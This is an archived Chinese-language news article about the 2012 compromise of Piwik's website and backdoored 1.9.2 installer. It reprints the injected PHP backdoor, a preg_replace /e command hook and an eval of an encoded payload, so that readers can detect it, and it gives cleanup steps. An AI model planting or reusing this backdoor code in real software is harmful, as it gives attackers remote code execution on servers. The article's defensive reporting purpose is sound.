登入  |  English
感謝您對「自由軟體鑄造場」的支持與愛護,十多年來「自由軟體鑄造場」受中央研究院支持,並在資訊科學研究所以及資訊科技創新研究中心執行,現已完成階段性的任務。 原網站預計持續維運至 2021年底,網站內容基本上不會再更動。本網站由 Denny Huang 備份封存。
也紀念我們永遠的朋友 李士傑先生(Shih-Chieh Ilya Li)。
源碼新聞 駭客盜入網站後將惡意程式碼植入開源專案 Piwik 的安裝包

駭客盜入網站後將惡意程式碼植入開源專案 Piwik 的安裝包

一位不知名的電腦駭客在破壞開源專案 Piwik 網路伺服器的安全機制後,將惡意程式碼植入了 Piwik 分析軟體的安裝包裡!Piwik 是用於傳輸即時網路流量的分析資訊程式,其功能類似 Google Analytics,不過可讓網站架設者安裝於自己的伺服器上進行自主管理。Piwik 截至目前為止,統計上已超過 120 萬次的下載記錄,且被廣泛地用於近 46 萬個網站上。發現這些惡意程式碼之後,該專案的維護人員對在 2012 年 11 月 26 日,共 8 小時網站安全空窗期間,下載安裝 Piwik 1.9.2 版本的使用者提出警告,其表示這些使用者的網站伺服器有可能執行內嵌有惡意程式碼的 Piwik。此 8 小時的空窗期間,起於世界標準時 15:45 至 23:59,被植入的後門 (backdoor) 程式碼,會主動將資料由伺服器送至 prostoivse.com 這個網址,該網域名稱以及 IP 位置,在過去就經常被報導是被線上惡意攻擊者所利用。

此次安全失防事件,肇始於該名駭客利用 Piwik.org 網站上,所使用某一 WordPress 未公開插件 (plugin) 的安全漏洞進行攻擊,雖然 Wordpress 這樣的內容管理系統 (Content Management System, CMS),本身透過開源的方式來提升系統的漏洞防堵效率,然而這並不表示被個別使用到的非開源插件,亦能跟上這樣的更新速度。Piwik 的安全性顧問表示:維修人員並沒有發現 Piwik 程式本身有任何可被利用的安全漏洞,但就是網站架設的管理機制需要再行加強。Piwik 專案的使用者,若想要確認伺服器是否執行的是有問題的後門版本,可以開啟檔案 piwik/core/Loader.php,看看是否有下述惡意程式碼:

< ? php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
 preg_replace("/(.+)/e", $_GET['g'], 'dwm'); exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$

最後三行程式碼中有包含 base-64 編碼文字,那是惡意軟體用來壓縮資料,以掩飾所作所為。根據 The H Security 的報導,該程式碼組合顯示為檔案 lic.log,並啟動 /piwik/core/DataTable/Filter/Megre.php,好讓駭客可以持續利用後門進出受到感染的系統。Piwik的管理人員表示,使用者若發現前述程式碼,應該將 piwik/config/config.ini.php 檔案備份,然後將全部的 piwik 目錄刪除,之後重新至官網下載安裝更新版。截至目前為止,Piwik 的官方維修人員仍不願證實該 WordPress plugin 漏洞的細節資訊,也沒有提供有關後門攻擊的額外技術文件。

其實相關的網站防護資安事件並不乏見,今年九月,SourceForge 於南韓的鏡像站 (mirror site) 上的 phpMyAdmin 專案,就被發現有被值入惡意程式碼;去年六月,WordPress.org 網站也要求站台上的所有帳號所有人必須更改密碼,因為管理員發現該網站也疑似被惡意軟體污染。三個月之前,PHP 程式語言的官網管理者,也發現他們其中一台伺服器的安全防護已被突破,維修人員進而耗費數天徹底檢測,是否有惡意程式碼潛藏在相關網站儲放的程式碼中。其實整體來看,自由軟體基金會 (Free Software Foundation)、Apache Software Foundation,以及 Linux Foundation 轄下的 Linux Kernel 維護網站,這幾年或多或少都有遭受到駭客的網路攻擊。

大體而言,成熟並有穩定團隊維護的自由開源軟體專案,其安全性並不是一個過於讓人擔心的問題,這是因為開發與除錯者眾,所以當發現系統漏洞或是資安缺口時,往往能在短時間就被發現而得到修補。然而,若是在自由開源軟體專案上去混用並未開源的元件,則此時系統維安的責任,就要混合系統的管理者多盡一份心力,才有可能做到最高層級的防範。


相關網址:

  1. 駭客利用 WordPress plugin 將惡意程式碼植入 Piwik 專案的釋出檔案
    https://arstechnica.com/security/2012/11/malicious-code-added-to-open-source-piwik-following-website-compromise/l
  2. Piwik 釋出檔被置入惡意程式的後門
    https://www.csoonline.com/article/722479/piwik-software-installer-rigged-with-back-door-following-website-compromise



自由軟體鑄造場電子報 : 第 209 期 於 NOKIA N900 上安裝 w3m on Maemo 5
標籤: ,  
分類: 源碼新聞